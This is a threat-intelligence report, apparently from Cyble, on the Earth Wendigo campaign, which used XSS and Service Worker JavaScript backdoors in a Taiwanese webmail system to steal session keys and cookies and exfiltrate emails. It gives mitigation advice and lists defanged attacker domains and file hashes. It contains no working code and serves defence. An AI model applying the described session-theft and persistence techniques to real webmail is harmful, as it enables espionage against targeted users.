A newly discovered malware was found to be exfiltrating emails from several organizations, including government organizations, research institutions, and universities in Taiwan. The attackers carried out this operation by injecting a Javascript Backdoor to a popularly used webmail system in Taiwan. The threat actor has no connection with any of the already prevailing attack groups. The attack flow of Earth Wendigo is represented in the image below.
Further investigation revealed that the threat actor has also targeted specific individuals with spear-phishing emails in a separate attack campaign. Targeted individuals include politicians and activists who support movements in Tibet, Hong Kong or the Uyghur region.
Initial Access:
The threat actor follows a series of sophisticated steps to carry out the attack. Firstly, a spear-phishing email appended with obfuscated Javascript code is sent to the target individual. As soon as the victim reads the mail, the Javascript code contacts a remote server and loads malicious scripts into the target system.
Behavior and Objectives of the attack:
The scripts are designed to perform malicious actions such as stealing browser cookies and webmail session keys and sending them to the remote server. The malicious scripts are also appended to the victim’s email signature to propagate the infection to their contacts.
The threat actors are exploiting the cross-site scripting (XSS) vulnerability of the webmail system to allow their malicious JavaScript to be injected on the webmail page permanently. The vulnerability in the Webmail system has already been fixed in January 2020. Therefore, this should not affect those using the latest version of the webmail system.
In case the attackers are unable to inject the XSS vulnerability, they use a web browser feature that allows the Javascript to intercept and manipulate the HTTPS request between the client and the server by registering their malicious Javascript to Service Worker. This Service Worker script can then expropriate login credentials.
The malicious code also contains a cookie stealer script that generates a request to “/cgi-bin/start,” which is a wrapper page embedded within the webmail session key. The script then extracts the session key and browser cookies. The image below shows the malicious script to steal the browser cookie and session key.
On successfully carrying out the attack, the backdoor can read emails on the server and send their content and attachments to the attacker’s WebSocket server. The backdoor also infects other individuals by appending the malicious Javascript to the emails sent by the victim to his contacts using the same webmail system.
Earth Wendigo was also found to be using multiple malware variants written in python. The variants are communicating to the same domain used in the Wendigo attack. Most of the variants are shellcode loaders from the Cobalt strike group. However, it is unclear what additional code they delivered on the victim’s system from the attacker’s C&C server.
XSS attacks like the one carried out by Earth Wendigo can be avoided by adopting security measures such as:
- Enabling a Content Security Policy in your security product to prevent cross-site scripting, clickjacking, and other code injection attacks.
- Using HTTP Public Key Pinning to prevent attackers from using mis-issued or otherwise fraudulent digital certificates.
Indicators of Compromise(IOCs)
| Indicator | Description |
| mail2000tw[.]com | Domain operated by Earth Wendigo |
| bf[.]mail2000tw[.]com | Domain operated by Earth Wendigo |
| admin[.]mail2000tw[.]com | Domain operated by Earth Wendigo |
| googletwtw[.]com | Domain operated by Earth Wendigo |
| bf[.]googletwtw[.]com | Domain operated by Earth Wendigo |
| ws[.]googletwtw[.]com | Domain operated by Earth Wendigo |
| admin[.]googletwtw[.]com | Domain operated by Earth Wendigo |
| anybodyopenfind[.]com | Domain operated by Earth Wendigo |
| support[.]anybodyopenfind[.]com | Domain operated by Earth Wendigo |
| supports[.]anybodyopenfind[.]com | Domain operated by Earth Wendigo |
| supportss[.]anybodyopenfind[.]com | Domain operated by Earth Wendigo |
| a61e84ac9b9d3009415c7982887dd7834ba2e7c8ea9098f33280d82b9a81f923 | Earth Wendigo XSS attack script |
| 66cf12bb9b013c30f9db6484caa5d5d0a94683887cded2758886aae1cb5c1c65 | Earth Wendigo XSS attack script |
| 4cdaca6b01f52092a1dd30fc68ee8f6d679ea6f7a21974e4a3eb8d14be6f5d74 | Earth Wendigo XSS attack script |
| f50a589f3b3ebcc326bab55d1ef271dcec372c25d65f381a409ea85929a34b49 | Earth Wendigo XSS attack script |
| e047aa878f9e7a55a80cc1b70d0ac9840251691e91ab6454562afbff427b0879 | Earth Wendigo XSS attack script |
| a1a6dc2a6c795fc315085d00aa7fdabd1f043b28c68d4f98d4152fe539f026f1 | Earth Wendigo XSS attack script |
| 10d2158828b953ff1140376ceb79182486525fd14b98f743dafa317110c1b289 | Earth Wendigo XSS attack script |
| 0e04a03afa5b66014457136fb4d437d51da9067dc88452f9ebd098d10c97c5b8 | Earth Wendigo XSS attack script |
| 75f3f724a2bfda1e74e0de36ff6a12d3f2ea599a594845d7e6bc7c76429e0fa4 | Earth Wendigo XSS attack script |
| c3bc364409bb0c4453f6d80351477ff8a13a1acdc5735a9dff4ea4b3f5ad201c | Earth Wendigo XSS attack script |
| 5251087bb2a0c87ac60c13f2edb7c39fb1ea26984fcc07e4cf8b39db31ce2b08 | Earth Wendigo XSS attack script |
| 7fa9a58163dd233065a86f9ed6857ed698fc6e454e6b428ea93f4f711279fb61 | Earth Wendigo XSS attack script |
| f568f823959be80a707e05791718c1c3c377da1b0db1865821c1cf7bc53b6084 | Earth Wendigo XSS attack script |
| a54d58d5a5812abaede3e2012ae757d378fb51c7d3974eaa3a3f34511161c1db | Earth Wendigo XSS attack script |
| 77c3d62cce21c2c348f825948042f7d36999e3be80db32ac98950e88db4140b1 | Earth Wendigo XSS attack script |
| c0dabb52c73173ea0b597ae4ad90d67c23c85110b06aa3c9e110a852ebe04420 | Earth Wendigo Service Worker script |
| efe541889f3da7672398d7ad00b8243e94d13cc3254ed59cd547ad172c1aa4be | Earth Wendigo WebSocket JavaScript backdoor |
| 2411b7b9ada83f6586278e0ad36b42a98513c9047a272a5dcb4a2754ba8e6f1d | Earth Wendigo Shellcode Loader |
| 1de54855b15fc55b4a865723224119029e51b381a11fda5d05159c74f50cb7de | Earth Wendigo Shellcode Loader |
| d935c9fe8e229f1dabcc0ceb02a9ce7130ae313dd18de0b1aca69741321a7d1b | Earth Wendigo Shellcode Loader |
| 50f23b6f4dff77ce4101242ebc3f12ea40156a409a7417ecf6564af344747b76 | Earth Wendigo Shellcode Loader |
| fab0c4e0992afe35c5e99bf9286db94313ffedc77d138e96af940423b2ca1cf2 | Earth Wendigo Shellcode Loader |
| 4d9c63127befad0b65078ccd821a9cd6c1dccec3e204a253751e7213a2d39e39 | Earth Wendigo Shellcode Loader |
| 25258044c838c6fc14a447573a4a94662170a7b83f08a8d76f96fbbec3ab08e2 | Earth Wendigo Shellcode Loader |
| 13952e13d310fb5102fd4a90e4eafe6291bc97e09eba50fedbc2f8900c80165f | Earth Wendigo Shellcode Loader |
| ccb7be5a5a73104106c669d7c58b13a55eb9db3b3b5a6d3097ac8b68f2555d39 | Earth Wendigo Shellcode Loader |
| 40a251184bb680edadfa9778a37135227e4191163882ccf170835e0658b1e0ed | Earth Wendigo Shellcode Loader |
| 0d6c3cc46be2c2c951c24c695558be1e2338635176fa34e8b36b3e751ccdb0de | Cobalt Strike |
Source:
About Cyble
Cyble is a global threat intelligence SaaS provider that helps enterprises protect themselves from cybercrimes and exposure in the darkweb. Cyble’s prime focus is to provide organizations with real-time visibility into their digital risk footprint. Backed by Y Combinator as part of the 2021 winter cohort, Cyble has also been recognized by Forbes as one of the top 20 Best Cybersecurity Startups To Watch In 2020. Headquartered in Alpharetta, Georgia, and with offices in Australia, Singapore, and India, Cyble has a global presence. To learn more about Cyble, visit www.cyble.com.
